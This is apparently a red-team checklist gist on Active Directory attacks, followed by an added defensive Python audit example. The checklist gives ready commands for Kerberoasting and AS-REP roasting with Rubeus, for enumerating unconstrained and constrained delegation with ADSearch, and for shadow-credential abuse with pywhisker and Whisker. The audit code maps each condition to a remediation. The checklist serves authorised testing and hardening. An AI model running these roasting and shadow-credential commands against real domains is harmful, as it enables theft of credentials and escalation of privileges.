@swtornio
Last active February 15, 2025 06:33
# Red Team Checklist
## Kerberoasting
Find SPNS (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName`
Roast individually
`C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:sqlsvc /nowrap`
## ASREP Roasting
Find accounts without pre-auth enabled (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname`
Roast individually
`C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrap`
## Unconstrained Delegation
Find all computers permitted for unconstrained delegation (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname`
## Constrained Delegation
Find all computers permitted for constrained delegation (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json`
## Resource-based Constrained Delegation
Check MachineAccountQuota for quick win
## Shadow Credentials
If `msDS-KeyCredentialLink` is writable for this object, a TGT can be obtained
`pywhisker.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET" --action "list"`
`C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc$`
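Added audit example, not part of the gist: a Python function that applies the same attribute checks the ADSearch filters above express (user with SPN, `DONT_REQUIRE_PREAUTH`, `TRUSTED_FOR_DELEGATION`, `msDS-AllowedToDelegateTo`, `msDS-KeyCredentialLink`) to records from a directory snapshot export and maps each finding to a hardening action. The flat dict record layout and every sample account are assumptions constructed for the example.

```python
# Added example (not from the gist): audit snapshot records for the conditions the
# checklist searches for. Record layout and sample accounts below are constructed.
UF_TRUSTED_FOR_DELEGATION = 0x80000   # 524288: unconstrained delegation
UF_DONT_REQUIRE_PREAUTH = 0x400000    # 4194304: AS-REP roastable

# Hardening action per finding (defender's view of each checklist item).
REMEDIATION = {
    "kerberoastable": "use a gMSA or a long random password; enforce AES",
    "asrep-roastable": "clear DONT_REQUIRE_PREAUTH on the account",
    "unconstrained-delegation": "move to constrained/RBCD or remove delegation",
    "constrained-delegation": "review msDS-AllowedToDelegateTo targets",
    "key-credential-link-set": "confirm enrolment is legitimate; audit write ACL",
}

def audit_object(obj):
    """Findings for one record; `uac & flag` mirrors LDAP rule 1.2.840.113556.1.4.803."""
    findings = []
    cat = obj.get("objectCategory", "").lower()
    uac = int(obj.get("userAccountControl", 0))
    if cat == "user" and obj.get("servicePrincipalName"):
        findings.append("kerberoastable")
    if cat == "user" and uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("asrep-roastable")
    if cat == "computer" and uac & UF_TRUSTED_FOR_DELEGATION:
        findings.append("unconstrained-delegation")
    if cat == "computer" and obj.get("msDS-AllowedToDelegateTo"):
        findings.append("constrained-delegation")
    if obj.get("msDS-KeyCredentialLink"):
        findings.append("key-credential-link-set")
    return findings

def audit_snapshot(objects):
    """Map sAMAccountName -> [(finding, remediation)] for every flagged record."""
    report = {}
    for obj in objects:
        found = audit_object(obj)
        if found:
            report[obj["sAMAccountName"]] = [(f, REMEDIATION[f]) for f in found]
    return report

SAMPLE = [  # constructed records, not real accounts
    {"sAMAccountName": "sqlsvc", "objectCategory": "user", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "svc_legacy", "objectCategory": "user", "userAccountControl": 0x400200},
    {"sAMAccountName": "DC01$", "objectCategory": "computer", "userAccountControl": 0x82000},
    {"sAMAccountName": "WEB01$", "objectCategory": "computer", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "alice", "objectCategory": "user", "userAccountControl": 0x200},
]
```

Running `audit_snapshot(SAMPLE)` flags the four service and computer accounts and leaves `alice` out; the same function can be pointed at a real ADExplorer export once its columns are mapped to these attribute names.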